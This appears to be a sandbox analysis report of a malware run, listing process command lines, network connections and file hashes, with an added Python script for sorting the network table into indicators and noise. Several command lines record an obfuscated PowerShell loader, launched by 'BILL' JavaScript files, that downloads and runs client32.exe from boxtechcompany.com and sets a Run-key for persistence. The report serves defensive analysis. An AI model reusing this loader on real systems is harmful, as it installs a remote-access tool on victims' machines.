"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $rSWtfPHxWB='https://boxtechcompany.com/1/GetData.php?14396';$nHOWpVklImSTUOhYYBi=(New-Object System.Net.WebClient).DownloadString($rSWtfPHxWB);$jcRdbxdvRpQileHzMRdoTehDjWhtoWrPXn=[System.Convert]::FromBase64String($nHOWpVklImSTUOhYYBi);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer -PathType Container)) { New-Item -Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer -ItemType Directory };$p=Join-Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$jcRdbxdvRpQileHzMRdoTehDjWhtoWrPXn);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer -Force; $FSDFSSD.attributes='Hidden';$s=$ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe
"C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5128 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL33615.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $rajXRsKbLyahKmgEQDRAysTgndvrH='https://boxtechcompany.com/1/GetData.php?14032';$rjENXRCqoSqtoTmbRXtRUFSynJahYI=(New-Object System.Net.WebClient).DownloadString($rajXRsKbLyahKmgEQDRAysTgndvrH);$mzPXXDkRSgchHwrjafrXw=[System.Convert]::FromBase64String($rjENXRCqoSqtoTmbRXtRUFSynJahYI);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $DqYWXtvBt=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $DqYWXtvBt -PathType Container)) { New-Item -Path $DqYWXtvBt -ItemType Directory };$p=Join-Path $DqYWXtvBt 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$mzPXXDkRSgchHwrjafrXw);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$DqYWXtvBt)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $DqYWXtvBt 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $DqYWXtvBt -Force; $FSDFSSD.attributes='Hidden';$s=$DqYWXtvBt+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe
"C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL33615.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $ERnqGIyavgxZkhhFQQzcsMLi='https://boxtechcompany.com/1/GetData.php?5702';$uiEIBqhhSA=(New-Object System.Net.WebClient).DownloadString($ERnqGIyavgxZkhhFQQzcsMLi);$RBFufKpXmacFNkTysIcaZnCklUwhgv=[System.Convert]::FromBase64String($uiEIBqhhSA);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $qdQZulxrcLjODJPetdoUbikqRuSmW=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $qdQZulxrcLjODJPetdoUbikqRuSmW -PathType Container)) { New-Item -Path $qdQZulxrcLjODJPetdoUbikqRuSmW -ItemType Directory };$p=Join-Path $qdQZulxrcLjODJPetdoUbikqRuSmW 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$RBFufKpXmacFNkTysIcaZnCklUwhgv);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$qdQZulxrcLjODJPetdoUbikqRuSmW)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $qdQZulxrcLjODJPetdoUbikqRuSmW 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $qdQZulxrcLjODJPetdoUbikqRuSmW -Force; $FSDFSSD.attributes='Hidden';$s=$qdQZulxrcLjODJPetdoUbikqRuSmW+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe
"C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5192 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5908 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4988 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL10601.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $ZCImZQTlpULGp='https://boxtechcompany.com/1/GetData.php?7461';$IZtUzYNNReOunQUmIUqVkfdoVrvHlgee=(New-Object System.Net.WebClient).DownloadString($ZCImZQTlpULGp);$IINLLLBDoklTTt=[System.Convert]::FromBase64String($IZtUzYNNReOunQUmIUqVkfdoVrvHlgee);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $keRzOmOdlHhfQWTzLhoha=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $keRzOmOdlHhfQWTzLhoha -PathType Container)) { New-Item -Path $keRzOmOdlHhfQWTzLhoha -ItemType Directory };$p=Join-Path $keRzOmOdlHhfQWTzLhoha 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$IINLLLBDoklTTt);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$keRzOmOdlHhfQWTzLhoha)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $keRzOmOdlHhfQWTzLhoha 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $keRzOmOdlHhfQWTzLhoha -Force; $FSDFSSD.attributes='Hidden';$s=$keRzOmOdlHhfQWTzLhoha+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe
"C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5004 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:2
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL63351.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $PloRsvrHYwhtLNPidec='https://boxtechcompany.com/1/GetData.php?13982';$BZzdVKTFxUSytwkCkWrbBWxxpvhxeUsMGc=(New-Object System.Net.WebClient).DownloadString($PloRsvrHYwhtLNPidec);$eqEzuySWdZoamCI=[System.Convert]::FromBase64String($BZzdVKTFxUSytwkCkWrbBWxxpvhxeUsMGc);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $RLZeZQGsCLTvWqlepOEruhuLtjvdf=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf -PathType Container)) { New-Item -Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf -ItemType Directory };$p=Join-Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$eqEzuySWdZoamCI);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RLZeZQGsCLTvWqlepOEruhuLtjvdf)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $RLZeZQGsCLTvWqlepOEruhuLtjvdf -Force; $FSDFSSD.attributes='Hidden';$s=$RLZeZQGsCLTvWqlepOEruhuLtjvdf+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe
"C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=1488 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=6364 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=6588 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6472 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6848 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6852 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=7152 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1684 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6440 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5916 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6304 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4356 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=6380 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1760 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | blawx.com | udp |
| RU | 188.127.227.29:80 | blawx.com | tcp |
| RU | 188.127.227.29:80 | blawx.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.187.238:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | lh5.googleusercontent.com | udp |
| GB | 142.250.180.1:443 | lh5.googleusercontent.com | tcp |
| GB | 142.250.180.1:443 | lh5.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 29.227.127.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.180.1:443 | lh5.googleusercontent.com | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| RU | 188.127.227.29:443 | blawx.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 184.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blawx.com | udp |
| RU | 188.127.227.29:443 | blawx.com | tcp |
| US | 8.8.8.8:53 | boxtechcompany.com | udp |
| RU | 188.127.224.160:443 | boxtechcompany.com | tcp |
| US | 8.8.8.8:53 | 160.224.127.188.in-addr.arpa | udp |
| NL | 81.19.137.226:443 | | tcp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| US | 172.67.68.212:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | 226.137.19.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.68.67.172.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| RU | 188.127.227.29:443 | blawx.com | tcp |
| US | 8.8.8.8:53 | boxtechcompany.com | udp |
| RU | 188.127.224.160:443 | boxtechcompany.com | tcp |
| RU | 188.127.227.29:443 | blawx.com | tcp |
| RU | 188.127.224.160:443 | boxtechcompany.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 3.49.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| SG | 172.217.194.94:443 | beacons2.gvt2.com | tcp |
| SG | 172.217.194.94:443 | beacons2.gvt2.com | tcp |
| SG | 172.217.194.94:443 | beacons2.gvt2.com | udp |
| US | 8.8.8.8:53 | 94.194.217.172.in-addr.arpa | udp |
| RU | 188.127.227.29:80 | blawx.com | tcp |
| GB | 142.250.187.238:443 | apis.google.com | udp |
| GB | 142.250.180.1:443 | lh5.googleusercontent.com | udp |
| RU | 188.127.227.29:443 | blawx.com | tcp |
| RU | 188.127.224.160:443 | boxtechcompany.com | tcp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| RU | 188.127.227.29:443 | blawx.com | tcp |
| RU | 188.127.224.160:443 | boxtechcompany.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 68.204.58.216.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | virustotal.com | udp |
| US | 216.239.34.21:443 | virustotal.com | tcp |
| US | 216.239.34.21:443 | virustotal.com | tcp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | 21.34.239.216.in-addr.arpa | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| GB | 142.250.200.3:443 | www.recaptcha.net | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | 46.34.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| GB | 142.250.179.227:443 | recaptcha.net | tcp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| GB | 142.250.179.227:443 | recaptcha.net | udp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | 5.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 216.58.212.227:443 | beacons.gvt2.com | tcp |
| GB | 216.58.212.227:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | 227.212.58.216.in-addr.arpa | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | e2c43.gcp.gvt2.com | udp |
| NL | 35.214.142.18:443 | e2c43.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 18.142.214.35.in-addr.arpa | udp |
| GB | 216.58.212.227:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | udp |
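The table above mixes the detonation's real infrastructure (blawx.com on 188.127.227.29, boxtechcompany.com on 188.127.224.160, a TLS connection to 81.19.137.226 with no DNS name, and the NetSupport client's own check-in to geo.netsupportsoftware.com) with resolver traffic, the reverse lookups the sandbox performs on every peer, and Chrome, Google, PKI and VirusTotal traffic from the browser session. The following is an added example, not part of the report: it parses a constructed subset of these rows and separates them into candidate C2, direct-IP connections, vendor checks and noise. The benign-zone list is an analyst assumption, and a row whose Domain cell is empty is kept as a direct-IP indicator rather than dropped, whichever column the protocol landed in.

```python
"""Separate this report's Network table into IOCs and sandbox noise.

Added example, not part of the report. SAMPLE_ROWS is a constructed subset
of the table above; BENIGN_ZONES and VENDOR_ZONES are analyst assumptions.
"""
import ipaddress
from collections import defaultdict
from typing import NamedTuple

SAMPLE_ROWS = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | blawx.com | udp |
| RU | 188.127.227.29:80 | blawx.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.187.238:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 29.227.127.188.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| RU | 188.127.227.29:443 | blawx.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | boxtechcompany.com | udp |
| RU | 188.127.224.160:443 | boxtechcompany.com | tcp |
| NL | 81.19.137.226:443 | | tcp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| US | 172.67.68.212:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
""".splitlines()

# Assumed benign zones: browser telemetry, PKI validation, the analyst's own
# VirusTotal visit during the session. Tune per environment.
BENIGN_ZONES = ("google.com", "googleusercontent.com", "googleapis.com",
                "gvt2.com", "recaptcha.net", "google-analytics.com",
                "virustotal.com", "identrust.com")
# The NetSupport client's geolocation check: evidence the RAT ran, but it is
# vendor infrastructure, so it is not a C2 indicator.
VENDOR_ZONES = ("netsupportsoftware.com",)


class Flow(NamedTuple):
    country: str
    ip: str
    port: int
    domain: str
    proto: str


def in_zone(domain: str, zones) -> bool:
    return any(domain == z or domain.endswith("." + z) for z in zones)


def parse_row(line: str):
    """Parse one '| CC | ip:port | domain | proto |' row. Tolerates rows with an
    empty Domain cell, whichever column the protocol ended up in."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if len(cells) < 3 or ":" not in cells[1]:
        return None  # header or malformed row
    ip, port = cells[1].rsplit(":", 1)
    rest = [c for c in cells[2:] if c]
    proto = next((c.lower() for c in rest if c.lower() in ("tcp", "udp")), "")
    domain = next((c.lower() for c in rest if c.lower() not in ("tcp", "udp")), "")
    return Flow(cells[0], ip, int(port), domain, proto)


def classify(f: Flow) -> str:
    if f.domain.endswith(".in-addr.arpa") or ipaddress.ip_address(f.ip).is_multicast:
        return "ignore"          # sandbox reverse lookups, mDNS
    if not f.domain:
        return "direct_ip"       # connection with no DNS name recorded
    if in_zone(f.domain, VENDOR_ZONES):
        return "vendor"
    if in_zone(f.domain, BENIGN_ZONES):
        return "noise"
    if f.port == 53:
        return "dns"             # query only; the connection row carries the IP
    return "candidate"


def triage_table(lines):
    report = {"queries": set(), "direct_ip": set(), "vendor_checks": set(), "noise": set(),
              "candidates": defaultdict(lambda: {"ips": set(), "ports": set()})}
    for f in filter(None, map(parse_row, lines)):
        kind = classify(f)
        if kind == "dns":
            report["queries"].add(f.domain)
        elif kind == "candidate":
            report["candidates"][f.domain]["ips"].add(f.ip)
            report["candidates"][f.domain]["ports"].add(f.port)
        elif kind == "direct_ip":
            report["direct_ip"].add((f.ip, f.port))
        elif kind == "vendor":
            report["vendor_checks"].add(f.domain)
        elif kind == "noise":
            report["noise"].add(f.domain)
    return report


if __name__ == "__main__":
    r = triage_table(SAMPLE_ROWS)
    for dom, info in sorted(r["candidates"].items()):
        print(dom, sorted(info["ips"]), sorted(info["ports"]))
    print("direct:", sorted(r["direct_ip"]), "vendor:", sorted(r["vendor_checks"]))
```

The direct-IP bucket is the one not to lose: 81.19.137.226:443 has no matching DNS query anywhere in the table, so a domain-only blocklist built from this report would miss it. Conversely, geo.netsupportsoftware.com belongs in a detection for "NetSupport client started", not in a C2 blocklist, because legitimately deployed NetSupport Manager installations contact it too.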
Files
\??\pipe\crashpad_1260_ULZWCYPJRYRQITGD
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 547beaf63ead9326310ac0cb9a7446a8 |
| SHA1 | 8be1b5f63ff5d27aab4e552c9c768836f017a970 |
| SHA256 | 7c87b872b7679a3d10f1bd86f18081d99b386ce4512febe54c7f84635bfca3ce |
| SHA512 | 2b84824c52b91cf80c9627f4b7caddfd40aabc482f21d15313460b6cac041737acd5bf8640cdedcc2a7f4fcb7f332d48b23589fcd5e0648fcc229ba025038c7b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\b7579423-7d5b-4e1c-b32d-da0e3e3c70be.tmp
| MD5 | f8c1c1ffcfbe6f7a250f45dee470af83 |
